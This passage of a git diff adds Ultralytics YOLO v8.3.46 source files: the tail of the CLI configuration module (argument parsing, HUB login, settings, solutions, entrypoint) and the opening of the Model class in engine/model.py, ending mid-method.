'=val'] becomes ['arg=val'] + 4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]'] + + Args: + args (List[str]): A list of strings where each element represents an argument or fragment. + + Returns: + List[str]: A list of strings where the arguments around isolated '=' are merged and fragments with brackets are joined. + + Examples: + >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"] + >>> merge_and_join_args(args) + ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]'] + """ + new_args = [] + current = "" + depth = 0 + + i = 0 + while i < len(args): + arg = args[i] + + # Handle equals sign merging + if arg == "=" and 0 < i < len(args) - 1: # merge ['arg', '=', 'val'] + new_args[-1] += f"={args[i + 1]}" + i += 2 + continue + elif arg.endswith("=") and i < len(args) - 1 and "=" not in args[i + 1]: # merge ['arg=', 'val'] + new_args.append(f"{arg}{args[i + 1]}") + i += 2 + continue + elif arg.startswith("=") and i > 0: # merge ['arg', '=val'] + new_args[-1] += arg + i += 1 + continue + + # Handle bracket joining + depth += arg.count("[") - arg.count("]") + current += arg + if depth == 0: + new_args.append(current) + current = "" + + i += 1 + + # Append any remaining current string + if current: + new_args.append(current) + + return new_args + + +def handle_yolo_hub(args: List[str]) -> None: + """ + Handles Ultralytics HUB command-line interface (CLI) commands for authentication. + + This function processes Ultralytics HUB CLI commands such as login and logout. It should be called when executing a + script with arguments related to HUB authentication. + + Args: + args (List[str]): A list of command line arguments. The first argument should be either 'login' + or 'logout'. For 'login', an optional second argument can be the API key. + + Examples: + ```bash + yolo login YOUR_API_KEY + ``` + + Notes: + - The function imports the 'hub' module from ultralytics to perform login and logout operations. + - For the 'login' command, if no API key is provided, an empty string is passed to the login function. + - The 'logout' command does not require any additional arguments. + """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. + - For more information on handling YOLO settings, visit: + https://docs.ultralytics.com/quickstart/#ultralytics-settings + """ + url = "https://docs.ultralytics.com/quickstart/#ultralytics-settings" # help URL + try: + if any(args): + if args[0] == "reset": + SETTINGS_FILE.unlink() # delete the settings file + SETTINGS.reset() # create new settings + LOGGER.info("Settings reset successfully") # inform the user that settings have been reset + else: # save a new setting + new = dict(parse_key_value_pair(a) for a in args) + check_dict_alignment(SETTINGS, new) + SETTINGS.update(new) + + print(SETTINGS) # print the current settings + LOGGER.info(f"💡 Learn more about Ultralytics Settings at {url}") + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ settings error: '{e}'. Please see {url} for help.") + + +def handle_yolo_solutions(args: List[str]) -> None: + """ + Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline. + + Args: + args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO + solutions: https://docs.ultralytics.com/solutions/, It can include solution name, source, + and other configuration parameters. + + Returns: + None: The function processes video frames and saves the output but doesn't return any value. + + Examples: + Run people counting solution with default settings: + >>> handle_yolo_solutions(["count"]) + + Run analytics with custom configuration: + >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"]) + + Notes: + - Default configurations are merged from DEFAULT_SOL_DICT and DEFAULT_CFG_DICT + - Arguments can be provided in the format 'key=value' or as boolean flags + - Available solutions are defined in SOLUTION_MAP with their respective classes and methods + - If an invalid solution is provided, defaults to 'count' solution + - Output videos are saved in 'runs/solution/{solution_name}' directory + - For 'analytics' solution, frame numbers are tracked for generating analytical graphs + - Video processing can be interrupted by pressing 'q' + - Processes video frames sequentially and saves output in .avi format + - If no source is specified, downloads and uses a default sample video + """ + full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT} # arguments dictionary + overrides = {} + + # check dictionary alignment + for arg in merge_equals_args(args): + arg = arg.lstrip("-").rstrip(",") + if "=" in arg: + try: + k, v = parse_key_value_pair(arg) + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {arg: ""}, e) + elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool): + overrides[arg] = True + check_dict_alignment(full_args_dict, overrides) # dict alignment + + # Get solution name + if args and args[0] in SOLUTION_MAP: + if args[0] != "help": + s_n = args.pop(0) # Extract the solution name directly + else: + LOGGER.info(SOLUTIONS_HELP_MSG) + else: + LOGGER.warning( + f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}" + ) + s_n = "count" # Default solution if none provided + + if args and args[0] == "help": # Add check for return if user call `yolo solutions help` + return + + cls, method = SOLUTION_MAP[s_n] # solution class name, method name and default source + + from ultralytics import solutions # import ultralytics solutions + + solution = getattr(solutions, cls)(IS_CLI=True, **overrides) # get solution class i.e ObjectCounter + process = getattr(solution, method) # get specific function of class for processing i.e, count from ObjectCounter + + cap = cv2.VideoCapture(solution.CFG["source"]) # read the video file + + # extract width, height and fps of the video file, create save directory and initialize video writer + import os # for directory creation + from pathlib import Path + + from ultralytics.utils.files import increment_path # for output directory path update + + w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS)) + if s_n == "analytics": # analytical graphs follow fixed shape for output i.e w=1920, h=1080 + w, h = 1920, 1080 + save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False) + save_dir.mkdir(parents=True, exist_ok=True) # create the output directory + vw = cv2.VideoWriter(os.path.join(save_dir, "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h)) + + try: # Process video frames + f_n = 0 # frame number, required for analytical graphs + while cap.isOpened(): + success, frame = cap.read() + if not success: + break + frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame) + vw.write(frame) + if cv2.waitKey(1) & 0xFF == ord("q"): + break + finally: + cap.release() + + +def handle_streamlit_inference(): + """ + Open the Ultralytics Live Inference Streamlit app for real-time object detection. + + This function initializes and runs a Streamlit application designed for performing live object detection using + Ultralytics models. It checks for the required Streamlit package and launches the app. + + Examples: + >>> handle_streamlit_inference() + + Notes: + - Requires Streamlit version 1.29.0 or higher. + - The app is launched using the 'streamlit run' command. + - The Streamlit app file is located in the Ultralytics package directory. + """ + checks.check_requirements("streamlit>=1.29.0") + LOGGER.info("💡 Loading Ultralytics Live Inference app...") + subprocess.run(["streamlit", "run", ROOT / "solutions/streamlit_inference.py", "--server.headless", "true"]) + + +def parse_key_value_pair(pair: str = "key=value"): + """ + Parses a key-value pair string into separate key and value components. + + Args: + pair (str): A string containing a key-value pair in the format "key=value". + + Returns: + key (str): The parsed key. + value (str): The parsed value. + + Raises: + AssertionError: If the value is missing or empty. + + Examples: + >>> key, value = parse_key_value_pair("model=yolo11n.pt") + >>> print(f"Key: {key}, Value: {value}") + Key: model, Value: yolo11n.pt + + >>> key, value = parse_key_value_pair("epochs=100") + >>> print(f"Key: {key}, Value: {value}") + Key: epochs, Value: 100 + + Notes: + - The function splits the input string on the first '=' character. + - Leading and trailing whitespace is removed from both key and value. + - An assertion error is raised if the value is empty after stripping. + """ + k, v = pair.split("=", 1) # split on first '=' sign + k, v = k.strip(), v.strip() # remove spaces + assert v, f"missing '{k}' value" + return k, smart_value(v) + + +def smart_value(v): + """ + Converts a string representation of a value to its appropriate Python type. + + This function attempts to convert a given string into a Python object of the most appropriate type. It handles + conversions to None, bool, int, float, and other types that can be evaluated safely. + + Args: + v (str): The string representation of the value to be converted. + + Returns: + (Any): The converted value. The type can be None, bool, int, float, or the original string if no conversion + is applicable. + + Examples: + >>> smart_value("42") + 42 + >>> smart_value("3.14") + 3.14 + >>> smart_value("True") + True + >>> smart_value("None") + None + >>> smart_value("some_string") + 'some_string' + + Notes: + - The function uses a case-insensitive comparison for boolean and None values. + - For other types, it attempts to use Python's eval() function, which can be unsafe if used on untrusted input. + - If no conversion is possible, the original string is returned. + """ + v_lower = v.lower() + if v_lower == "none": + return None + elif v_lower == "true": + return True + elif v_lower == "false": + return False + else: + try: + return eval(v) + except Exception: + return v + + +def entrypoint(debug=""): + """ + Ultralytics entrypoint function for parsing and executing command-line arguments. + + This function serves as the main entry point for the Ultralytics CLI, parsing command-line arguments and + executing the corresponding tasks such as training, validation, prediction, exporting models, and more. + + Args: + debug (str): Space-separated string of command-line arguments for debugging purposes. + + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. Using default 'format={overrides['format']}'.") + + # Run command in python + getattr(model, mode)(**overrides) # default args from model + + # Show help + LOGGER.info(f"💡 Learn more at https://docs.ultralytics.com/modes/{mode}") + + # Recommend VS Code extension + if IS_VSCODE and SETTINGS.get("vscode_msg", True): + LOGGER.info(vscode_msg()) + + +# Special modes -------------------------------------------------------------------------------------------------------- +def copy_default_cfg(): + """ + Copies the default configuration file and creates a new one with '_copy' appended to its name. + + This function duplicates the existing default configuration file (DEFAULT_CFG_PATH) and saves it + with '_copy' appended to its name in the current working directory. It provides a convenient way + to create a custom configuration file based on the default settings. + + Examples: + >>> copy_default_cfg() + # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml + # Example YOLO command with this new custom cfg: + # yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8 + + Notes: + - The new configuration file is created in the current working directory. + - After copying, the function prints a message with the new file's location and an example + YOLO command demonstrating how to use the new configuration file. + - This function is useful for users who want to modify the default configuration without + altering the original file. + """ + new_file = Path.cwd() / DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml") + shutil.copy2(DEFAULT_CFG_PATH, new_file) + LOGGER.info( + f"{DEFAULT_CFG_PATH} copied to {new_file}\n" + f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8" + ) + + +if __name__ == "__main__": + # Example: entrypoint(debug='yolo predict model=yolo11n.pt') + entrypoint(debug="") diff --git a/2024.ultralytics/v8.3.46/engine/model.py b/2024.ultralytics/v8.3.46/engine/model.py new file mode 100644 index 0000000..db8d87e --- /dev/null +++ b/2024.ultralytics/v8.3.46/engine/model.py @@ -0,0 +1,1175 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import inspect +from pathlib import Path +from typing import Dict, List, Union + +import numpy as np +import torch +from PIL import Image + +from ultralytics.cfg import TASK2DATA, get_cfg, get_save_dir +from ultralytics.engine.results import Results +from ultralytics.hub import HUB_WEB_ROOT, HUBTrainingSession +from ultralytics.nn.tasks import attempt_load_one_weight, guess_model_task, nn, yaml_model_load +from ultralytics.utils import ( + ARGV, + ASSETS, + DEFAULT_CFG_DICT, + LOGGER, + RANK, + SETTINGS, + callbacks, + checks, + emojis, + yaml_load, +) + + +class Model(nn.Module): + """ + A base class for implementing YOLO models, unifying APIs across different model types. + + This class provides a common interface for various operations related to YOLO models, such as training, + validation, prediction, exporting, and benchmarking. It handles different types of models, including those + loaded from local files, Ultralytics HUB, or Triton Server. + + Attributes: + callbacks (Dict): A dictionary of callback functions for various events during model operations. + predictor (BasePredictor): The predictor object used for making predictions. + model (nn.Module): The underlying PyTorch model. + trainer (BaseTrainer): The trainer object used for training the model. + ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. + + Examples: + >>> from ultralytics import YOLO + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict("image.jpg") + >>> model.train(data="coco8.yaml", epochs=3) + >>> metrics = model.val() + >>> model.export(format="onnx") + """ + + def __init__( + self, + model: Union[str, Path] = "yolo11n.pt", + task: str = None, + verbose: bool = False, + ) -> None: + """ + Initializes a new instance of the YOLO model class. + + This constructor sets up the model based on the provided model path or name. It handles various types of + model sources, including local files, Ultralytics HUB models, and Triton Server models. The method + initializes several important attributes of the model and prepares it for operations like training, + prediction, or export. + + Args: + model (Union[str, Path]): Path or name of the model to load or create. Can be a local file path, a + model name from Ultralytics HUB, or a Triton Server model. + task (str | None): The task type associated with the YOLO model, specifying its application domain. + verbose (bool): If True, enables verbose output during the model's initialization and subsequent + operations. + + Raises: + FileNotFoundError: If the specified model file does not exist or is inaccessible. + ValueError: If the model file or configuration is invalid or unsupported. + ImportError: If required dependencies for specific model types (like HUB SDK) are not installed. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = Model("path/to/model.yaml", task="detect") + >>> model = Model("hub_model", verbose=True) + """ + super().__init__() + self.callbacks = callbacks.get_default_callbacks() + self.predictor = None # reuse predictor + self.model = None # model object + self.trainer = None # trainer object + self.ckpt = None # if loaded from *.pt + self.cfg = None # if loaded from *.yaml + self.ckpt_path = None + self.overrides = {} # overrides for trainer object + self.metrics = None # validation/training metrics + self.session = None # HUB session + self.task = task # task type + model = str(model).strip() + + # Check if Ultralytics HUB model from https://hub.ultralytics.com + if self.is_hub_model(model): + # Fetch model from HUB + checks.check_requirements("hub-sdk>=0.0.12") + session = HUBTrainingSession.create_session(model) + model = session.model_file + if session.train_args: # training sent from HUB + self.session = session + + # Check if Triton Server model + elif self.is_triton_model(model): + self.model_name = self.model = model + self.overrides["task"] = task or "detect" # set `task=detect` if not explicitly set + return + + # Load or create new YOLO model + if Path(model).suffix in {".yaml", ".yml"}: + self._new(model, task=task, verbose=verbose) + else: + self._load(model, task=task) + + # Delete super().training for accessing self.model.training + del self.training + + def __call__( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Alias for the predict method, enabling the model instance to be callable for predictions. + + This method simplifies the process of making predictions by allowing the model instance to be called + directly with the required arguments. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of + the image(s) to make predictions on. Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. + + Examples: + >>> Model.is_hub_model("https://hub.ultralytics.com/models/MODEL") + True + >>> Model.is_hub_model("yolo11n.pt") + False + """ + return model.startswith(f"{HUB_WEB_ROOT}/models/") + + def _new(self, cfg: str, task=None, model=None, verbose=False) -> None: + """ + Initializes a new model and infers the task type from the model definitions. + + This method creates a new model instance based on the provided configuration file. It loads the model + configuration, infers the task type if not specified, and initializes the model using the appropriate + class from the task map. + + Args: + cfg (str): Path to the model configuration file in YAML format. + task (str | None): The specific task for the model. If None, it will be inferred from the config. + model (torch.nn.Module | None): A custom model instance. If provided, it will be used instead of creating + a new one. + verbose (bool): If True, displays model information during loading. + + Raises: + ValueError: If the configuration file is invalid or the task cannot be inferred. + ImportError: If the required dependencies for the specified task are not installed. + + Examples: + >>> model = Model() + >>> model._new("yolov8n.yaml", task="detect", verbose=True) + """ + cfg_dict = yaml_model_load(cfg) + self.cfg = cfg + self.task = task or guess_model_task(cfg_dict) + self.model = (model or self._smart_load("model"))(cfg_dict, verbose=verbose and RANK == -1) # build model + self.overrides["model"] = self.cfg + self.overrides["task"] = self.task + + # Below added to allow export from YAMLs + self.model.args = {**DEFAULT_CFG_DICT, **self.overrides} # combine default and model args (prefer model args) + self.model.task = self.task + self.model_name = cfg + + def _load(self, weights: str, task=None) -> None: + """ + Loads a model from a checkpoint file or initializes it from a weights file. + + This method handles loading models from either .pt checkpoint files or other weight file formats. It sets + up the model, task, and related attributes based on the loaded weights. + + Args: + weights (str): Path to the model weights file to be loaded. + task (str | None): The task associated with the model. If None, it will be inferred from the model. + + Raises: + FileNotFoundError: If the specified weights file does not exist or is inaccessible. + ValueError: If the weights file format is unsupported or invalid. + + Examples: + >>> model = Model() + >>> model._load("yolo11n.pt") + >>> model._load("path/to/weights.pth", task="detect") + """ + if weights.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): + weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"]) # download and return local file + weights = checks.check_model_file_from_stem(weights) # add suffix, i.e. yolov8n -> yolov8n.pt + + if Path(weights).suffix == ".pt": + self.model, self.ckpt = attempt_load_one_weight(weights) + self.task = self.model.args["task"] + self.overrides = self.model.args = self._reset_ckpt_args(self.model.args) + self.ckpt_path = self.model.pt_path + else: + weights = checks.check_file(weights) # runs in all cases, not redundant with above call + self.model, self.ckpt = weights, None + self.task = task or guess_model_task(weights) + self.ckpt_path = weights + self.overrides["model"] = weights + self.overrides["task"] = self.task + self.model_name = weights + + def _check_is_pytorch_model(self) -> None: + """ + Checks if the model is a PyTorch model and raises a TypeError if it's not. + + This method verifies that the model is either a PyTorch module or a .pt file. It's used to ensure that + certain operations that require a PyTorch model are only performed on compatible model types. + + Raises: + TypeError: If the model is not a PyTorch module or a .pt file. The error message provides detailed + information about supported model formats and operations. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model._check_is_pytorch_model() # No error raised + >>> model = Model("yolov8n.onnx") + >>> model._check_is_pytorch_model() # Raises TypeError + """ + pt_str = isinstance(self.model, (str, Path)) and Path(self.model).suffix == ".pt" + pt_module = isinstance(self.model, nn.Module) + if not (pt_module or pt_str): + raise TypeError( + f"model='{self.model}' should be a *.pt PyTorch model to run this method, but is a different format. " + f"PyTorch models can train, val, predict and export, i.e. 'model.train(data=...)', but exported " + f"formats like ONNX, TensorRT etc. only support 'predict' and 'val' modes, " + f"i.e. 'yolo predict model=yolov8n.onnx'.\nTo run CUDA or MPS inference please pass the device " + f"argument directly in your inference command, i.e. 'model.predict(source=..., device=0)'" + ) + + def reset_weights(self) -> "Model": + """ + Resets the model's weights to their initial state. + + This method iterates through all modules in the model and resets their parameters if they have a + 'reset_parameters' method. It also ensures that all parameters have 'requires_grad' set to True, + enabling them to be updated during training. + + Returns: + (Model): The instance of the class with reset weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.reset_weights() + """ + self._check_is_pytorch_model() + for m in self.model.modules(): + if hasattr(m, "reset_parameters"): + m.reset_parameters() + for p in self.model.parameters(): + p.requires_grad = True + return self + + def load(self, weights: Union[str, Path] = "yolo11n.pt") -> "Model": + """ + Loads parameters from the specified weights file into the model. + + This method supports loading weights from a file or directly from a weights object. It matches parameters by + name and shape and transfers them to the model. + + Args: + weights (Union[str, Path]): Path to the weights file or a weights object. + + Returns: + (Model): The instance of the class with loaded weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model() + >>> model.load("yolo11n.pt") + >>> model.load(Path("path/to/weights.pt")) + """ + self._check_is_pytorch_model() + if isinstance(weights, (str, Path)): + self.overrides["pretrained"] = weights # remember the weights for DDP training + weights, self.ckpt = attempt_load_one_weight(weights) + self.model.load(weights) + return self + + def save(self, filename: Union[str, Path] = "saved_model.pt") -> None: + """ + Saves the current model state to a file. + + This method exports the model's checkpoint (ckpt) to the specified filename. It includes metadata such as + the date, Ultralytics version, license information, and a link to the documentation. + + Args: + filename (Union[str, Path]): The name of the file to save the model to. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.save("my_model.pt") + """ + self._check_is_pytorch_model() + from copy import deepcopy + from datetime import datetime + + from ultralytics import __version__ + + updates = { + "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model, + "date": datetime.now().isoformat(), + "version": __version__, + "license": "AGPL-3.0 License (https://ultralytics.com/license)", + "docs": "https://docs.ultralytics.com", + } + torch.save({**self.ckpt, **updates}, filename) + + def info(self, detailed: bool = False, verbose: bool = True): + """ + Logs or returns model information. + + This method provides an overview or detailed information about the model, depending on the arguments + passed. It can control the verbosity of the output and return the information as a list. + + Args: + detailed (bool): If True, shows detailed information about the model layers and parameters. + verbose (bool): If True, prints the information. If False, returns the information as a list. + + Returns: + (List[str]): A list of strings containing various types of information about the model, including + model summary, layer details, and parameter counts. Empty if verbose is True. + + Raises: + TypeError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.info() # Prints model summary + >>> info_list = model.info(detailed=True, verbose=False) # Returns detailed info as a list + """ + self._check_is_pytorch_model() + return self.model.info(detailed=detailed, verbose=verbose) + + def fuse(self): + """ + Fuses Conv2d and BatchNorm2d layers in the model for optimized inference. + + This method iterates through the model's modules and fuses consecutive Conv2d and BatchNorm2d layers + into a single layer. This fusion can significantly improve inference speed by reducing the number of + operations and memory accesses required during forward passes. + + The fusion process typically involves folding the BatchNorm2d parameters (mean, variance, weight, and + bias) into the preceding Conv2d layer's weights and biases. This results in a single Conv2d layer that + performs both convolution and normalization in one step. + + Raises: + TypeError: If the model is not a PyTorch nn.Module. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.fuse() + >>> # Model is now fused and ready for optimized inference + """ + self._check_is_pytorch_model() + self.model.fuse() + + def embed( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Generates image embeddings based on the provided source. + + This method is a wrapper around the 'predict()' method, focusing on generating embeddings from an image + source. It allows customization of the embedding process through various keyword arguments. + + Args: + source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for + generating embeddings. Can be a file path, URL, PIL image, numpy array, etc. + stream (bool): If True, predictions are streamed. + **kwargs (Any): Additional keyword arguments for configuring the embedding process. + + Returns: + (List[torch.Tensor]): A list containing the image embeddings. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> image = "https://ultralytics.com/images/bus.jpg" + >>> embeddings = model.embed(image) + >>> print(embeddings[0].shape) + """ + if not kwargs.get("embed"): + kwargs["embed"] = [len(self.model.model) - 2] # embed second-to-last layer if no indices passed + return self.predict(source, stream, **kwargs) + + def predict( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + predictor=None, + **kwargs, + ) -> 